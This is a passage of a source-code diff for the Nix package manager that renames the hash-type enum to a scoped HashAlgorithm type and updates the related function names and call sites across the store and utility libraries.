repair) + Source & dump, + std::string_view name, + ContentAddressMethod caMethod, + HashAlgorithm hashAlgo, + const StorePathSet & references, + RepairFlag repair) { std::optional conn_(getConnection()); auto & conn = *conn_; @@ -432,7 +432,7 @@ ref RemoteStore::addCAToStore( conn->to << WorkerProto::Op::AddToStore << name - << caMethod.render(hashType); + << caMethod.render(hashAlgo); WorkerProto::write(*this, *conn, references); conn->to << repair; @@ -453,9 +453,9 @@ ref RemoteStore::addCAToStore( std::visit(overloaded { [&](const TextIngestionMethod & thm) -> void { - if (hashType != htSHA256) + if (hashAlgo != HashAlgorithm::SHA256) throw UnimplementedError("When adding text-hashed data called '%s', only SHA-256 is supported but '%s' was given", - name, printHashType(hashType)); + name, printHashAlgo(hashAlgo)); std::string s = dump.drain(); conn->to << WorkerProto::Op::AddTextToStore << name << s; WorkerProto::write(*this, *conn, references); @@ -465,9 +465,9 @@ ref RemoteStore::addCAToStore( conn->to << WorkerProto::Op::AddToStore << name - << ((hashType == htSHA256 && fim == FileIngestionMethod::Recursive) ? 0 : 1) /* backwards compatibility hack */ + << ((hashAlgo == HashAlgorithm::SHA256 && fim == FileIngestionMethod::Recursive) ? 0 : 1) /* backwards compatibility hack */ << (fim == FileIngestionMethod::Recursive ? 1 : 0) - << printHashType(hashType); + << printHashAlgo(hashAlgo); try { conn->to.written = 0; @@ -503,9 +503,9 @@ ref RemoteStore::addCAToStore( StorePath RemoteStore::addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method, HashType hashType, RepairFlag repair, const StorePathSet & references) + FileIngestionMethod method, HashAlgorithm hashAlgo, RepairFlag repair, const StorePathSet & references) { - return addCAToStore(dump, name, method, hashType, references, repair)->path; + return addCAToStore(dump, name, method, hashAlgo, references, repair)->path; } @@ -610,7 +610,7 @@ StorePath RemoteStore::addTextToStore( RepairFlag repair) { StringSource source(s); - return addCAToStore(source, name, TextIngestionMethod {}, htSHA256, references, repair)->path; + return addCAToStore(source, name, TextIngestionMethod {}, HashAlgorithm::SHA256, references, repair)->path; } void RemoteStore::registerDrvOutput(const Realisation & info) diff --git a/src/libstore/remote-store.hh b/src/libstore/remote-store.hh index 1cc11af86..f2e34c1a3 100644 --- a/src/libstore/remote-store.hh +++ b/src/libstore/remote-store.hh @@ -74,18 +74,18 @@ public: * Add a content-addressable store path. `dump` will be drained. */ ref addCAToStore( - Source & dump, - std::string_view name, - ContentAddressMethod caMethod, - HashType hashType, - const StorePathSet & references, - RepairFlag repair); + Source & dump, + std::string_view name, + ContentAddressMethod caMethod, + HashAlgorithm hashAlgo, + const StorePathSet & references, + RepairFlag repair); /** * Add a content-addressable store path. Does not support references. `dump` will be drained. */ StorePath addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method = FileIngestionMethod::Recursive, HashType hashAlgo = htSHA256, RepairFlag repair = NoRepair, const StorePathSet & references = StorePathSet()) override; + FileIngestionMethod method = FileIngestionMethod::Recursive, HashAlgorithm hashAlgo = HashAlgorithm::SHA256, RepairFlag repair = NoRepair, const StorePathSet & references = StorePathSet()) override; void addToStore(const ValidPathInfo & info, Source & nar, RepairFlag repair, CheckSigsFlag checkSigs) override; diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index 8601e0857..800df7fa0 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -153,7 +153,7 @@ StorePath StoreDirConfig::makeStorePath(std::string_view type, /* e.g., "source:sha256:1abc...:/nix/store:foo.tar.gz" */ auto s = std::string(type) + ":" + std::string(hash) + ":" + storeDir + ":" + std::string(name); - auto h = compressHash(hashString(htSHA256, s), 20); + auto h = compressHash(hashString(HashAlgorithm::SHA256, s), 20); return StorePath(h, name); } @@ -191,12 +191,12 @@ static std::string makeType( StorePath StoreDirConfig::makeFixedOutputPath(std::string_view name, const FixedOutputInfo & info) const { - if (info.hash.type == htSHA256 && info.method == FileIngestionMethod::Recursive) { + if (info.hash.algo == HashAlgorithm::SHA256 && info.method == FileIngestionMethod::Recursive) { return makeStorePath(makeType(*this, "source", info.references), info.hash, name); } else { assert(info.references.size() == 0); return makeStorePath("output:out", - hashString(htSHA256, + hashString(HashAlgorithm::SHA256, "fixed:out:" + makeFileIngestionPrefix(info.method) + info.hash.to_string(HashFormat::Base16, true) + ":"), @@ -207,7 +207,7 @@ StorePath StoreDirConfig::makeFixedOutputPath(std::string_view name, const Fixed StorePath StoreDirConfig::makeTextPath(std::string_view name, const TextInfo & info) const { - assert(info.hash.type == htSHA256); + assert(info.hash.algo == HashAlgorithm::SHA256); return makeStorePath( makeType(*this, "text", StoreReferences { .others = info.references, @@ -233,11 +233,11 @@ StorePath StoreDirConfig::makeFixedOutputPathFromCA(std::string_view name, const std::pair StoreDirConfig::computeStorePathFromDump( - Source & dump, - std::string_view name, - FileIngestionMethod method, - HashType hashAlgo, - const StorePathSet & references) const + Source & dump, + std::string_view name, + FileIngestionMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references) const { HashSink sink(hashAlgo); dump.drainInto(sink); @@ -257,20 +257,20 @@ StorePath StoreDirConfig::computeStorePathForText( const StorePathSet & references) const { return makeTextPath(name, TextInfo { - .hash = hashString(htSHA256, s), + .hash = hashString(HashAlgorithm::SHA256, s), .references = references, }); } StorePath Store::addToStore( - std::string_view name, - const Path & _srcPath, - FileIngestionMethod method, - HashType hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) + std::string_view name, + const Path & _srcPath, + FileIngestionMethod method, + HashAlgorithm hashAlgo, + PathFilter & filter, + RepairFlag repair, + const StorePathSet & references) { Path srcPath(absPath(_srcPath)); auto source = sinkToSource([&](Sink & sink) { @@ -405,10 +405,10 @@ digraph graphname { } */ ValidPathInfo Store::addToStoreSlow(std::string_view name, const Path & srcPath, - FileIngestionMethod method, HashType hashAlgo, - std::optional expectedCAHash) + FileIngestionMethod method, HashAlgorithm hashAlgo, + std::optional expectedCAHash) { - HashSink narHashSink { htSHA256 }; + HashSink narHashSink { HashAlgorithm::SHA256 }; HashSink caHashSink { hashAlgo }; /* Note that fileSink and unusualHashTee must be mutually exclusive, since @@ -417,7 +417,7 @@ ValidPathInfo Store::addToStoreSlow(std::string_view name, const Path & srcPath, RegularFileSink fileSink { caHashSink }; TeeSink unusualHashTee { narHashSink, caHashSink }; - auto & narSink = method == FileIngestionMethod::Recursive && hashAlgo != htSHA256 + auto & narSink = method == FileIngestionMethod::Recursive && hashAlgo != HashAlgorithm::SHA256 ? static_cast(unusualHashTee) : narHashSink; @@ -445,7 +445,7 @@ ValidPathInfo Store::addToStoreSlow(std::string_view name, const Path & srcPath, finish. */ auto [narHash, narSize] = narHashSink.finish(); - auto hash = method == FileIngestionMethod::Recursive && hashAlgo == htSHA256 + auto hash = method == FileIngestionMethod::Recursive && hashAlgo == HashAlgorithm::SHA256 ? narHash : caHashSink.finish().first; @@ -1205,7 +1205,7 @@ std::optional decodeValidPathInfo(const Store & store, std::istre if (!hashGiven) { std::string s; getline(str, s); - auto narHash = Hash::parseAny(s, htSHA256); + auto narHash = Hash::parseAny(s, HashAlgorithm::SHA256); getline(str, s); auto narSize = string2Int(s); if (!narSize) throw Error("number expected"); diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index 5860d0ea6..ada6699d5 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -427,13 +427,13 @@ public: * libutil/archive.hh). */ virtual StorePath addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method = FileIngestionMethod::Recursive, - HashType hashAlgo = htSHA256, - PathFilter & filter = defaultPathFilter, - RepairFlag repair = NoRepair, - const StorePathSet & references = StorePathSet()); + std::string_view name, + const Path & srcPath, + FileIngestionMethod method = FileIngestionMethod::Recursive, + HashAlgorithm hashAlgo = HashAlgorithm::SHA256, + PathFilter & filter = defaultPathFilter, + RepairFlag repair = NoRepair, + const StorePathSet & references = StorePathSet()); /** * Copy the contents of a path to the store and register the @@ -441,8 +441,8 @@ public: * memory. */ ValidPathInfo addToStoreSlow(std::string_view name, const Path & srcPath, - FileIngestionMethod method = FileIngestionMethod::Recursive, HashType hashAlgo = htSHA256, - std::optional expectedCAHash = {}); + FileIngestionMethod method = FileIngestionMethod::Recursive, HashAlgorithm hashAlgo = HashAlgorithm::SHA256, + std::optional expectedCAHash = {}); /** * Like addToStore(), but the contents of the path are contained @@ -454,8 +454,8 @@ public: * \todo remove? */ virtual StorePath addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method = FileIngestionMethod::Recursive, HashType hashAlgo = htSHA256, RepairFlag repair = NoRepair, - const StorePathSet & references = StorePathSet()) + FileIngestionMethod method = FileIngestionMethod::Recursive, HashAlgorithm hashAlgo = HashAlgorithm::SHA256, RepairFlag repair = NoRepair, + const StorePathSet & references = StorePathSet()) { unsupported("addToStoreFromDump"); } /** diff --git a/src/libstore/store-dir-config.hh b/src/libstore/store-dir-config.hh index 53843d663..8dafca096 100644 --- a/src/libstore/store-dir-config.hh +++ b/src/libstore/store-dir-config.hh @@ -98,7 +98,7 @@ struct StoreDirConfig : public Config Source & dump, std::string_view name, FileIngestionMethod method = FileIngestionMethod::Recursive, - HashType hashAlgo = htSHA256, + HashAlgorithm hashAlgo = HashAlgorithm::SHA256, const StorePathSet & references = {}) const; /** diff --git a/src/libstore/worker-protocol.cc b/src/libstore/worker-protocol.cc index 43654d7e8..2a379e75e 100644 --- a/src/libstore/worker-protocol.cc +++ b/src/libstore/worker-protocol.cc @@ -160,7 +160,7 @@ void WorkerProto::Serialise::write(const StoreDirConfig & store, UnkeyedValidPathInfo WorkerProto::Serialise::read(const StoreDirConfig & store, ReadConn conn) { auto deriver = readString(conn.from); - auto narHash = Hash::parseAny(readString(conn.from), htSHA256); + auto narHash = Hash::parseAny(readString(conn.from), HashAlgorithm::SHA256); UnkeyedValidPathInfo info(narHash); if (deriver != "") info.deriver = store.parseStorePath(deriver); info.references = WorkerProto::Serialise::read(store, conn); diff --git a/src/libutil/args.cc b/src/libutil/args.cc index c4b2975ee..ac3727d11 100644 --- a/src/libutil/args.cc +++ b/src/libutil/args.cc @@ -546,32 +546,32 @@ nlohmann::json Args::toJSON() static void hashTypeCompleter(AddCompletions & completions, size_t index, std::string_view prefix) { - for (auto & type : hashTypes) + for (auto & type : hashAlgorithms) if (hasPrefix(type, prefix)) completions.add(type); } -Args::Flag Args::Flag::mkHashTypeFlag(std::string && longName, HashType * ht) +Args::Flag Args::Flag::mkHashTypeFlag(std::string && longName, HashAlgorithm * ha) { return Flag { .longName = std::move(longName), .description = "hash algorithm ('md5', 'sha1', 'sha256', or 'sha512')", .labels = {"hash-algo"}, - .handler = {[ht](std::string s) { - *ht = parseHashType(s); + .handler = {[ha](std::string s) { + *ha = parseHashAlgo(s); }}, .completer = hashTypeCompleter, }; } -Args::Flag Args::Flag::mkHashTypeOptFlag(std::string && longName, std::optional * oht) +Args::Flag Args::Flag::mkHashTypeOptFlag(std::string && longName, std::optional * oha) { return Flag { .longName = std::move(longName), .description = "hash algorithm ('md5', 'sha1', 'sha256', or 'sha512'). Optional as can also be gotten from SRI hash itself.", .labels = {"hash-algo"}, - .handler = {[oht](std::string s) { - *oht = std::optional { parseHashType(s) }; + .handler = {[oha](std::string s) { + *oha = std::optional {parseHashAlgo(s) }; }}, .completer = hashTypeCompleter, }; diff --git a/src/libutil/args.hh b/src/libutil/args.hh index 72278dccc..0cff76158 100644 --- a/src/libutil/args.hh +++ b/src/libutil/args.hh @@ -14,7 +14,7 @@ namespace nix { -enum HashType : char; +enum struct HashAlgorithm : char; class MultiCommand; @@ -175,8 +175,8 @@ protected: std::optional experimentalFeature; - static Flag mkHashTypeFlag(std::string && longName, HashType * ht); - static Flag mkHashTypeOptFlag(std::string && longName, std::optional * oht); + static Flag mkHashTypeFlag(std::string && longName, HashAlgorithm * ha); + static Flag mkHashTypeOptFlag(std::string && longName, std::optional * oha); }; /** diff --git a/src/libutil/git.cc b/src/libutil/git.cc index a4bd60096..296b75628 100644 --- a/src/libutil/git.cc +++ b/src/libutil/git.cc @@ -106,7 +106,7 @@ void parse( std::string hashs = getString(source, 20); left -= 20; - Hash hash(htSHA1); + Hash hash(HashAlgorithm::SHA1); std::copy(hashs.begin(), hashs.end(), hash.hash); hook(name, TreeEntry { @@ -241,12 +241,12 @@ Mode dump( TreeEntry dumpHash( - HashType ht, - SourceAccessor & accessor, const CanonPath & path, PathFilter & filter) + HashAlgorithm ha, + SourceAccessor & accessor, const CanonPath & path, PathFilter & filter) { std::function hook; hook = [&](const CanonPath & path) -> TreeEntry { - auto hashSink = HashSink(ht); + auto hashSink = HashSink(ha); auto mode = dump(accessor, path, hashSink, hook, filter); auto hash = hashSink.finish().first; return { diff --git a/src/libutil/git.hh b/src/libutil/git.hh index 303460072..b24b25dd3 100644 --- a/src/libutil/git.hh +++ b/src/libutil/git.hh @@ -123,9 +123,9 @@ Mode dump( * A smaller wrapper around `dump`. */ TreeEntry dumpHash( - HashType ht, - SourceAccessor & accessor, const CanonPath & path, - PathFilter & filter = defaultPathFilter); + HashAlgorithm ha, + SourceAccessor & accessor, const CanonPath & path, + PathFilter & filter = defaultPathFilter); /** * A line from the output of `git ls-remote --symref`. diff --git a/src/libutil/hash.cc b/src/libutil/hash.cc index 144f7ae7e..38a29c459 100644 --- a/src/libutil/hash.cc +++ b/src/libutil/hash.cc @@ -16,23 +16,23 @@ namespace nix { -static size_t regularHashSize(HashType type) { +static size_t regularHashSize(HashAlgorithm type) { switch (type) { - case htMD5: return md5HashSize; - case htSHA1: return sha1HashSize; - case htSHA256: return sha256HashSize; - case htSHA512: return sha512HashSize; + case HashAlgorithm::MD5: return md5HashSize; + case HashAlgorithm::SHA1: return sha1HashSize; + case HashAlgorithm::SHA256: return sha256HashSize; + case HashAlgorithm::SHA512: return sha512HashSize; } abort(); } -std::set hashTypes = { "md5", "sha1", "sha256", "sha512" }; +std::set hashAlgorithms = {"md5", "sha1", "sha256", "sha512" }; -Hash::Hash(HashType type) : type(type) +Hash::Hash(HashAlgorithm algo) : algo(algo) { - hashSize = regularHashSize(type); + hashSize = regularHashSize(algo); assert(hashSize <= maxHashSize); memset(hash, 0, maxHashSize); } @@ -109,16 +109,16 @@ static std::string printHash32(const Hash & hash) std::string printHash16or32(const Hash & hash) { - assert(hash.type); - return hash.to_string(hash.type == htMD5 ? HashFormat::Base16 : HashFormat::Base32, false); + assert(static_cast(hash.algo)); + return hash.to_string(hash.algo == HashAlgorithm::MD5 ? HashFormat::Base16 : HashFormat::Base32, false); } -std::string Hash::to_string(HashFormat hashFormat, bool includeType) const +std::string Hash::to_string(HashFormat hashFormat, bool includeAlgo) const { std::string s; - if (hashFormat == HashFormat::SRI || includeType) { - s += printHashType(type); + if (hashFormat == HashFormat::SRI || includeAlgo) { + s += printHashAlgo(algo); s += hashFormat == HashFormat::SRI ? '-' : ':'; } switch (hashFormat) { @@ -136,7 +136,7 @@ std::string Hash::to_string(HashFormat hashFormat, bool includeType) const return s; } -Hash Hash::dummy(htSHA256); +Hash Hash::dummy(HashAlgorithm::SHA256); Hash Hash::parseSRI(std::string_view original) { auto rest = original; @@ -145,18 +145,18 @@ Hash Hash::parseSRI(std::string_view original) { auto hashRaw = splitPrefixTo(rest, '-'); if (!hashRaw) throw BadHash("hash '%s' is not SRI", original); - HashType parsedType = parseHashType(*hashRaw); + HashAlgorithm parsedType = parseHashAlgo(*hashRaw); return Hash(rest, parsedType, true); } // Mutates the string to eliminate the prefixes when found -static std::pair, bool> getParsedTypeAndSRI(std::string_view & rest) +static std::pair, bool> getParsedTypeAndSRI(std::string_view & rest) { bool isSRI = false; // Parse the hash type before the separator, if there was one. - std::optional optParsedType; + std::optional optParsedType; { auto hashRaw = splitPrefixTo(rest, ':'); @@ -166,7 +166,7 @@ static std::pair, bool> getParsedTypeAndSRI(std::string_ isSRI = true; } if (hashRaw) - optParsedType = parseHashType(*hashRaw); + optParsedType = parseHashAlgo(*hashRaw); } return {optParsedType, isSRI}; @@ -185,29 +185,29 @@ Hash Hash::parseAnyPrefixed(std::string_view original) return Hash(rest, *optParsedType, isSRI); } -Hash Hash::parseAny(std::string_view original, std::optional optType) +Hash Hash::parseAny(std::string_view original, std::optional optAlgo) { auto rest = original; auto [optParsedType, isSRI] = getParsedTypeAndSRI(rest); // Either the string or user must provide the type, if they both do they // must agree. - if (!optParsedType && !optType) + if (!optParsedType && !optAlgo) throw BadHash("hash '%s' does not include a type, nor is the type otherwise known from context", rest); - else if (optParsedType && optType && *optParsedType != *optType) - throw BadHash("hash '%s' should have type '%s'", original, printHashType(*optType)); + else if (optParsedType && optAlgo && *optParsedType != *optAlgo) + throw BadHash("hash '%s' should have type '%s'", original, printHashAlgo(*optAlgo)); - HashType hashType = optParsedType ? *optParsedType : *optType; - return Hash(rest, hashType, isSRI); + HashAlgorithm hashAlgo = optParsedType ? *optParsedType : *optAlgo; + return Hash(rest, hashAlgo, isSRI); } -Hash Hash::parseNonSRIUnprefixed(std::string_view s, HashType type) +Hash Hash::parseNonSRIUnprefixed(std::string_view s, HashAlgorithm algo) { - return Hash(s, type, false); + return Hash(s, algo, false); } -Hash::Hash(std::string_view rest, HashType type, bool isSRI) - : Hash(type) +Hash::Hash(std::string_view rest, HashAlgorithm algo, bool isSRI) + : Hash(algo) { if (!isSRI && rest.size() == base16Len()) { @@ -257,19 +257,19 @@ Hash::Hash(std::string_view rest, HashType type, bool isSRI) } else - throw BadHash("hash '%s' has wrong length for hash type '%s'", rest, printHashType(this->type)); + throw BadHash("hash '%s' has wrong length for hash algorithm '%s'", rest, printHashAlgo(this->algo)); } -Hash newHashAllowEmpty(std::string_view hashStr, std::optional ht) +Hash newHashAllowEmpty(std::string_view hashStr, std::optional ha) { if (hashStr.empty()) { - if (!ht) + if (!ha) throw BadHash("empty hash requires explicit hash type"); - Hash h(*ht); + Hash h(*ha); warn("found empty hash, assuming '%s'", h.to_string(HashFormat::SRI, true)); return h; } else - return Hash::parseAny(hashStr, ht); + return Hash::parseAny(hashStr, ha); } @@ -282,58 +282,58 @@ union Ctx }; -static void start(HashType ht, Ctx & ctx) +static void start(HashAlgorithm ha, Ctx & ctx) { - if (ht == htMD5) MD5_Init(&ctx.md5); - else if (ht == htSHA1) SHA1_Init(&ctx.sha1); - else if (ht == htSHA256) SHA256_Init(&ctx.sha256); - else if (ht == htSHA512) SHA512_Init(&ctx.sha512); + if (ha == HashAlgorithm::MD5) MD5_Init(&ctx.md5); + else if (ha == HashAlgorithm::SHA1) SHA1_Init(&ctx.sha1); + else if (ha == HashAlgorithm::SHA256) SHA256_Init(&ctx.sha256); + else if (ha == HashAlgorithm::SHA512) SHA512_Init(&ctx.sha512); } -static void update(HashType ht, Ctx & ctx, - std::string_view data) +static void update(HashAlgorithm ha, Ctx & ctx, + std::string_view data) { - if (ht == htMD5) MD5_Update(&ctx.md5, data.data(), data.size()); - else if (ht == htSHA1) SHA1_Update(&ctx.sha1, data.data(), data.size()); - else if (ht == htSHA256) SHA256_Update(&ctx.sha256, data.data(), data.size()); - else if (ht == htSHA512) SHA512_Update(&ctx.sha512, data.data(), data.size()); + if (ha == HashAlgorithm::MD5) MD5_Update(&ctx.md5, data.data(), data.size()); + else if (ha == HashAlgorithm::SHA1) SHA1_Update(&ctx.sha1, data.data(), data.size()); + else if (ha == HashAlgorithm::SHA256) SHA256_Update(&ctx.sha256, data.data(), data.size()); + else if (ha == HashAlgorithm::SHA512) SHA512_Update(&ctx.sha512, data.data(), data.size()); } -static void finish(HashType ht, Ctx & ctx, unsigned char * hash) +static void finish(HashAlgorithm ha, Ctx & ctx, unsigned char * hash) { - if (ht == htMD5) MD5_Final(hash, &ctx.md5); - else if (ht == htSHA1) SHA1_Final(hash, &ctx.sha1); - else if (ht == htSHA256) SHA256_Final(hash, &ctx.sha256); - else if (ht == htSHA512) SHA512_Final(hash, &ctx.sha512); + if (ha == HashAlgorithm::MD5) MD5_Final(hash, &ctx.md5); + else if (ha == HashAlgorithm::SHA1) SHA1_Final(hash, &ctx.sha1); + else if (ha == HashAlgorithm::SHA256) SHA256_Final(hash, &ctx.sha256); + else if (ha == HashAlgorithm::SHA512) SHA512_Final(hash, &ctx.sha512); } -Hash hashString(HashType ht, std::string_view s) +Hash hashString(HashAlgorithm ha, std::string_view s) { Ctx ctx; - Hash hash(ht); - start(ht, ctx); - update(ht, ctx, s); - finish(ht, ctx, hash.hash); + Hash hash(ha); + start(ha, ctx); + update(ha, ctx, s); + finish(ha, ctx, hash.hash); return hash; } -Hash hashFile(HashType ht, const Path & path) +Hash hashFile(HashAlgorithm ha, const Path & path) { - HashSink sink(ht); + HashSink sink(ha); readFile(path, sink); return sink.finish().first; } -HashSink::HashSink(HashType ht) : ht(ht) +HashSink::HashSink(HashAlgorithm ha) : ha(ha) { ctx = new Ctx; bytes = 0; - start(ht, *ctx); + start(ha, *ctx); } HashSink::~HashSink() @@ -345,14 +345,14 @@ HashSink::~HashSink() void HashSink::writeUnbuffered(std::string_view data) { bytes += data.size(); - update(ht, *ctx, data); + update(ha, *ctx, data); } HashResult HashSink::finish() { flush(); - Hash hash(ht); - nix::finish(ht, *ctx, hash.hash); + Hash hash(ha); + nix::finish(ha, *ctx, hash.hash); return HashResult(hash, bytes); } @@ -360,16 +360,16 @@ HashResult HashSink::currentHash() { flush(); Ctx ctx2 = *ctx; - Hash hash(ht); - nix::finish(ht, ctx2, hash.hash); + Hash hash(ha); + nix::finish(ha, ctx2, hash.hash); return HashResult(hash, bytes); } HashResult hashPath( - HashType ht, const Path & path, PathFilter & filter) + HashAlgorithm ha, const Path & path, PathFilter & filter) { - HashSink sink(ht); + HashSink sink(ha); dumpPath(path, sink, filter); return sink.finish(); } @@ -377,7 +377,7 @@ HashResult hashPath( Hash compressHash(const Hash & hash, unsigned int newSize) { - Hash h(hash.type); + Hash h(hash.algo); h.hashSize = newSize; for (unsigned int i = 0; i < hash.hashSize; ++i) h.hash[i % newSize] ^= hash.hash[i]; @@ -420,31 +420,31 @@ std::string_view printHashFormat(HashFormat HashFormat) } } -std::optional parseHashTypeOpt(std::string_view s) +std::optional parseHashAlgoOpt(std::string_view s) { - if (s == "md5") return htMD5; - if (s == "sha1") return htSHA1; - if (s == "sha256") return htSHA256; - if (s == "sha512") return htSHA512; + if (s == "md5") return HashAlgorithm::MD5; + if (s == "sha1") return HashAlgorithm::SHA1; + if (s == "sha256") return HashAlgorithm::SHA256; + if (s == "sha512") return HashAlgorithm::SHA512; return std::nullopt; } -HashType parseHashType(std::string_view s) +HashAlgorithm parseHashAlgo(std::string_view s) { - auto opt_h = parseHashTypeOpt(s); + auto opt_h = parseHashAlgoOpt(s); if (opt_h) return *opt_h; else throw UsageError("unknown hash algorithm '%1%', expect 'md5', 'sha1', 'sha256', or 'sha512'", s); } -std::string_view printHashType(HashType ht) +std::string_view printHashAlgo(HashAlgorithm ha) { - switch (ht) { - case htMD5: return "md5"; - case htSHA1: return "sha1"; - case htSHA256: return "sha256"; - case htSHA512: return "sha512"; + switch (ha) { + case HashAlgorithm::MD5: return "md5"; + case HashAlgorithm::SHA1: return "sha1"; + case HashAlgorithm::SHA256: return "sha256"; + case HashAlgorithm::SHA512: return "sha512"; default: // illegal hash type enum value internally, as opposed to external input // which should be validated with nice error message. diff --git a/src/libutil/hash.hh b/src/libutil/hash.hh index 820154e7a..3c97ed4b1 100644 --- a/src/libutil/hash.hh +++ b/src/libutil/hash.hh @@ -12,7 +12,7 @@ namespace nix { MakeError(BadHash, Error); -enum HashType : char { htMD5 = 42, htSHA1, htSHA256, htSHA512 }; +enum struct HashAlgorithm : char { MD5 = 42, SHA1, SHA256, SHA512 }; const int md5HashSize = 16; @@ -20,7 +20,7 @@ const int sha1HashSize = 20; const int sha256HashSize = 32; const int sha512HashSize = 64; -extern std::set hashTypes; +extern std::set hashAlgorithms; extern const std::string base32Chars; @@ -46,12 +46,12 @@ struct Hash size_t hashSize = 0; uint8_t hash[maxHashSize] = {}; - HashType type; + HashAlgorithm algo; /** * Create a zero-filled hash object. */ - explicit Hash(HashType type); + explicit Hash(HashAlgorithm algo); /** * Parse the hash from a string representation in the format @@ -60,7 +60,7 @@ struct Hash * is not present, then the hash type must be specified in the * string. */ - static Hash parseAny(std::string_view s, std::optional type); + static Hash parseAny(std::string_view s, std::optional optAlgo); /** * Parse a hash from a string representation like the above, except the @@ -72,7 +72,7 @@ struct Hash * Parse a plain hash that musst not have any prefix indicating the type. * The type is passed in to disambiguate. */ - static Hash parseNonSRIUnprefixed(std::string_view s, HashType type); + static Hash parseNonSRIUnprefixed(std::string_view s, HashAlgorithm algo); static Hash parseSRI(std::string_view original); @@ -81,7 +81,7 @@ private: * The type must be provided, the string view must not include * prefix. `isSRI` helps disambigate the various base-* encodings. */ - Hash(std::string_view s, HashType type, bool isSRI); + Hash(std::string_view s, HashAlgorithm algo, bool isSRI); public: /** @@ -125,10 +125,10 @@ public: /** * Return a string representation of the hash, in base-16, base-32 - * or base-64. By default, this is prefixed by the hash type + * or base-64. By default, this is prefixed by the hash algo * (e.g. "sha256:"). */ - [[nodiscard]] std::string to_string(HashFormat hashFormat, bool includeType) const; + [[nodiscard]] std::string to_string(HashFormat hashFormat, bool includeAlgo) const; [[nodiscard]] std::string gitRev() const { @@ -146,7 +146,7 @@ public: /** * Helper that defaults empty hashes to the 0 hash. */ -Hash newHashAllowEmpty(std::string_view hashStr, std::optional ht); +Hash newHashAllowEmpty(std::string_view hashStr, std::optional ha); /** * Print a hash in base-16 if it's MD5, or base-32 otherwise. @@ -156,14 +156,14 @@ std::string printHash16or32(const Hash & hash); /** * Compute the hash of the given string. */ -Hash hashString(HashType ht, std::string_view s); +Hash hashString(HashAlgorithm ha, std::string_view s); /** * Compute the hash of the given file, hashing its contents directly. * * (Metadata, such as the executable permission bit, is ignored.) */ -Hash hashFile(HashType ht, const Path & path); +Hash hashFile(HashAlgorithm ha, const Path & path); /** * Compute the hash of the given path, serializing as a Nix Archive and @@ -172,8 +172,8 @@ Hash hashFile(HashType ht, const Path & path); * The hash is defined as (essentially) hashString(ht, dumpPath(path)). */ typedef std::pair HashResult; -HashResult hashPath(HashType ht, const Path & path, - PathFilter & filter = defaultPathFilter); +HashResult hashPath(HashAlgorithm ha, const Path & path, + PathFilter & filter = defaultPathFilter); /** * Compress a hash to the specified number of bytes by cyclically @@ -199,17 +199,17 @@ std::string_view printHashFormat(HashFormat hashFormat); /** * Parse a string representing a hash type. */ -HashType parseHashType(std::string_view s); +HashAlgorithm parseHashAlgo(std::string_view s); /** * Will return nothing on parse error */ -std::optional parseHashTypeOpt(std::string_view s); +std::optional parseHashAlgoOpt(std::string_view s); /** * And the reverse. */ -std::string_view printHashType(HashType ht); +std::string_view printHashAlgo(HashAlgorithm ha); union Ctx; @@ -222,12 +222,12 @@ struct AbstractHashSink : virtual Sink class HashSink : public BufferedSink, public AbstractHashSink { private: - HashType ht; + HashAlgorithm ha; Ctx * ctx; uint64_t bytes; public: - HashSink(HashType ht); + HashSink(HashAlgorithm ha); HashSink(const HashSink & h); ~HashSink(); void writeUnbuffered(std::string_view data) override; diff --git a/src/libutil/references.cc b/src/libutil/references.cc index 9d75606ef..d82d51945 100644 --- a/src/libutil/references.cc +++ b/src/libutil/references.cc @@ -110,8 +110,8 @@ void RewritingSink::flush() prev.clear(); } -HashModuloSink::HashModuloSink(HashType ht, const std::string & modulus) - : hashSink(ht) +HashModuloSink::HashModuloSink(HashAlgorithm ha, const std::string & modulus) + : hashSink(ha) , rewritingSink(modulus, std::string(modulus.size(), 0), hashSink) { } diff --git a/src/libutil/references.hh b/src/libutil/references.hh index f0baeffe1..8bc9f7ec9 100644 --- a/src/libutil/references.hh +++ b/src/libutil/references.hh @@ -46,7 +46,7 @@ struct HashModuloSink : AbstractHashSink HashSink hashSink; RewritingSink rewritingSink; - HashModuloSink(HashType ht, const std::string & modulus); + HashModuloSink(HashAlgorithm ha, const std::string & modulus); void operator () (std::string_view data) override; diff --git a/src/libutil/source-accessor.cc b/src/libutil/source-accessor.cc index 7813433a7..afbbbe1a9 100644 --- a/src/libutil/source-accessor.cc +++ b/src/libutil/source-accessor.cc @@ -39,11 +39,11 @@ void SourceAccessor::readFile( } Hash SourceAccessor::hashPath( - const CanonPath & path, - PathFilter & filter, - HashType ht) + const CanonPath & path, + PathFilter & filter, + HashAlgorithm ha) { - HashSink sink(ht); + HashSink sink(ha); dumpPath(path, sink, filter); return sink.finish().first; } diff --git a/src/libutil/source-accessor.hh b/src/libutil/source-accessor.hh index 264caab16..3ca12d624 100644 --- a/src/libutil/source-accessor.hh +++ b/src/libutil/source-accessor.hh @@ -97,9 +97,9 @@ struct SourceAccessor PathFilter & filter = defaultPathFilter); Hash hashPath( - const CanonPath & path, - PathFilter & filter = defaultPathFilter, - HashType ht = htSHA256); + const CanonPath & path, + PathFilter & filter = defaultPathFilter, + HashAlgorithm ha = HashAlgorithm::SHA256); /** * Return a corresponding path in the root filesystem, if diff --git a/src/nix-store/nix-store.cc b/src/nix-store/nix-store.cc index 25f0107bc..75ad4e75f 100644 --- a/src/nix-store/nix-store.cc +++ b/src/nix-store/nix-store.cc @@ -193,7 +193,7 @@ static void opAddFixed(Strings opFlags, Strings opArgs) if (opArgs.empty()) throw UsageError("first argument must be hash algorithm"); - HashType hashAlgo = parseHashType(opArgs.front()); + HashAlgorithm hashAlgo = parseHashAlgo(opArgs.front()); opArgs.pop_front(); for (auto & i : opArgs) @@ -214,7 +214,7 @@ static void opPrintFixedPath(Strings opFlags, Strings opArgs) throw UsageError("'--print-fixed-path' requires three arguments"); Strings::iterator i = opArgs.begin(); - HashType hashAlgo = parseHashType(*i++); + HashAlgorithm hashAlgo = 